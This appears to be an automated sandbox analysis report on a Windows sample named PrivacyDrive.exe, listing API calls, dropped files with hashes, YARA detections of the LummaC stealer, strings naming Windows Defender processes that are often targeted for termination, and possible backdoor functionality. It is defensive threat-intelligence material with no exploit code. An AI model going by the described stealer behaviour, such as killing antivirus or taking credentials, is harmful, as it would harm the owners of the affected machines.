Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00414200 GetLocalTime,

4_2_00414200

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00476750 LookupAccountNameW,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,

4_2_00476750

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_004A83C0 _memset,_memset,GetVersionExW,

4_2_004A83C0

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.12.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040D05C RpcBindingFree,LeaveCriticalSection,	4_2_0040D05C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040D0B0 WaitForSingleObject,WaitForSingleObject,EnterCriticalSection,RpcBindingFree,LeaveCriticalSection,SetEvent,CloseHandle,	4_2_0040D0B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040CDF0 EnterCriticalSection,RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,RpcEpResolveBinding,RpcStringFreeW,RpcBindingFree,RpcStringFreeW,LeaveCriticalSection,	4_2_0040CDF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040CEEC RpcBindingFree,RpcStringFreeW,LeaveCriticalSection,	4_2_0040CEEC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040CF40 EnterCriticalSection,RpcBindingFree,LeaveCriticalSection,SetEvent,	4_2_0040CF40

Windows Analysis Report

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1519581
Product:	CloudBasic
Start time:	17:45:31
Start date:	26.09.2024
Cookbook:	defaultwindowscmdlinecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	B0E07EEAD2754656DB0445A04B7F8E67	5BAE55C9AFC07A25013DC00768B7CF18F0D0FE7D	77246B2A5767425122AC1EF60CF1A39ADF44F677D540AC522D20125A0B66F95B
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0x0dfd3e4c, page size 16384, DirtyShutdown, Windows version 10.0	906962F093C46FDE900BB5395773A91A	C6AF3F9C4EE86411811436BDB226453FAFE17BE8	6A0692C477FDB913E444C2937331C4F407C9AB87D92C103B83F484E0916680E7
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	64CA0858D9D04A02F82272376F91D571	D6466EE3AD39CF60173AA3E7AF2F2439D1123F64	D3349FF99C06D065DF78B192C27F4B5AF5849619A6F644145B3A9CA092149C47
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_399bced0f19559916f29b8661c38217a355522d5_7d659330_88be3ff3-0823-458e-b933-1ef07a852004\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	22DECCCF0721C379A7F5BA8298772C5C	DBFAD8BA9ADAA90E756D1BD4C59F88BB0BDEB2A3	6D16A0087DEDCD40DE5721C58B197B295FA293B3617B8BDE0232914F2884932A
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_399bced0f19559916f29b8661c38217a355522d5_7d659330_fca01ca3-85f0-4bce-8d1a-34dc9a94153d\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	85B7CD5FAC6DBB3A7BE894531EB79F90	5E4F2AF6ADBF1297A1755095515429FC97ADE774	0B36281554FFA82A06C89A7614B1C935A2DAE3ACC8C9EB00E4E706A9487F22A4
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_8656b2f314abb98882e678a2dbf4aab982b7182_7d659330_dd4513b3-028e-469c-93b1-188613156302\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	86D14B06F4275663AF9A15462E9C2594	81EE6EF947C10A6472A203E297567A22AD6E0688	0E3F3D2F029AF6CFA256C37A2AF2A1EDD1C797EBD4E3F9369039B2D4E2D0FCED
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_fef1a7949e4fa8cb69f4d5963b96612fcca58a7_7d659330_f744aa91-56af-4ef1-8f82-7361129391f5\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	3578AA287953D48009F2663494552057	64D9FA397A0BC619026131624A5186E7D85087E5	E1F4F2505E3429C1829AA8F761698C85F119E40EEF647A061C813A3ACB6B78BB
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C51.tmp.dmp	Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:49 2024, 0x1205a4 type	13153F245A415E8103B0865916CD08DE	AB0CCBBC4EFE23031CC1DF10FA997903742BBB6D	AD721C8228746ED53EA7B905B0E7FC10BD26BD0AC8AB7F8A6C556561E7A0E9BE
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F7E.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	6DCD769FFF6BDCACE450B935B24A8395	BB60C3FD6BA5CC9325FB308353FCCAC9C7BEB8AE	170132296494DF8E47D9AE8806BD912AB32CAEA6CB7B64A4902F55C90F1CCE46
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FAE.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	7D31A6A7B00F174B2A2E8618BCADFA53	E0C3C2ECD492868F94E0653EB62F8192581B4CB5	2D7DCD1AF7C292218AF607FA5C9855E86236D226CF221F822E728C02C5D99FDE
C:\ProgramData\Microsoft\Windows\WER\Temp\WER725C.tmp.dmp	Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:50 2024, 0x1205a4 type	8EB14848B11B41CF3C4E43ADA06E2C35	60009E72FDFBF7C7225DAD8D06CB5F4DD49BCB47	5A83821F19B3923C0B309139A57B69400798F58AD1C3C478CD9660512946E487
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7357.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	5849474776DB562D7E697CE3D4DEE8CF	1B0F49B4FC5ECE201613D628932C34CD1BC9F8DD	1B74A1C5AB8ECC89544A89680FEA789067159D1673C4F9660937F5A2ACF2FD0B
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7377.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	775B392C1839EB6D318787EA71DF0485	C960300A131D8C7A3A44C4AE6DB85D4E4E1C1A48	2051DAA44D7B9DBAA6FE7DEF304194CC03DB291F3F4FCFE87B68EC5C6E762DB9
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7634.tmp.dmp	Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:51 2024, 0x1205a4 type	5043FB3A074211CE653AE3394F1580E4	FA5D524E79B4A5C8652DE12FF40DA67807D806AD	FE7F41DE80D67A7F613E74287F6F357CC8B395B9A04C7EBDA61B1CAC5074BE9A
C:\ProgramData\Microsoft\Windows\WER\Temp\WER772F.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	272A4D91B961BD542B2E8863A03943E7	C9DF3F4285BA14C4E5148FDD3E3A13CBA34F7146	07B7BFA501C5F22DF133FD8CF5D37E02EC5FE9DE52143E226FA4AC22859BBCE0
C:\ProgramData\Microsoft\Windows\WER\Temp\WER774F.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	BA200BAC34410A0BD6F391E271389F46	58FB21389F2D2929C79D539A60DA79ED1208EE0F	17FAE734B858586DA7CA4D2E736BF051FF581452B597AED44F76016DA699966B
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9545.tmp.dmp	Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:59 2024, 0x1205a4 type	78C030A269210DB202D14FC9B6DA4C69	567479CC46C99A8BA14D7F4D949ABAF429DD06C7	EF83528B8C437DC766A30116A7E2396EAF4FD35C6D02347FD9389B4E30953954
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9602.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	FD50E145C9E9DBB730F344B6DC8A9F70	3B09A011F267081CCC902F00D1F65F70C7085981	DDB611468746A96AD7809263A5600E649B99ABC12474269AE4BDA6479F7E934A
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9632.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	9AC958A42939BE28A13F87CE1F66B363	940EF9424D6031BECE3B856532F6751D18B5A064	D1232145DFF5617145E07F32DF30E0FFC339ADB3FE79697FF0AEAD35BAADEFCF
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	514D7854938D395C95BAE82D6F73CC01	AF58640B7829CC8C252E0325919FDB12DC3CE8B9	7795366E8B3025A4EE3C786406F79CF7E8039DAFB47BCFC920BC84A861A7071B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3h4c44qq.aqz.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jngmtqb.epp.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anvhf53m.wns.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqbu2tt4.x4g.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fk2vrmc2.l3j.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ni4nz3ke.o2y.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\BIT2853.tmp	Zip archive data, at least v2.0 to extract, compression method=deflate	BB9EB573EAE8B10C74BCBFF43C81D5DB	79D70041A7410F018169C265307E7E73515EDBB8	793BC2F7A3FE1FBE2E4E8960A8C9E42671842ABB38399EB96E2AD601E8733529
C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	PE32 executable (GUI) Intel 80386, for MS Windows	80C2A36E9A14E3EDBA0B706D2433D9B8	03AC191B235B3A867539720070A5E6CA1108B4F2	154DAE39845ABEF889AF814BD6AD84283374C90ECECE891ADDC362384AFDD882
C:\Users\user\AppData\Roaming\yANrdNKT.zip (copy)	Zip archive data, at least v2.0 to extract, compression method=deflate	BB9EB573EAE8B10C74BCBFF43C81D5DB	79D70041A7410F018169C265307E7E73515EDBB8	793BC2F7A3FE1FBE2E4E8960A8C9E42671842ABB38399EB96E2AD601E8733529
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	3AD1381DB551FF94A284F5577A9FFD46	6901AD5E24141C9124CA442E97EF2883D45A1319	711933BFA5C5D5A8B4B847E1CD7746DDB44C7D841208F77F82D60FDE2A0570E6

Windows Analysis Report

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Malware Threat Intel
Provided by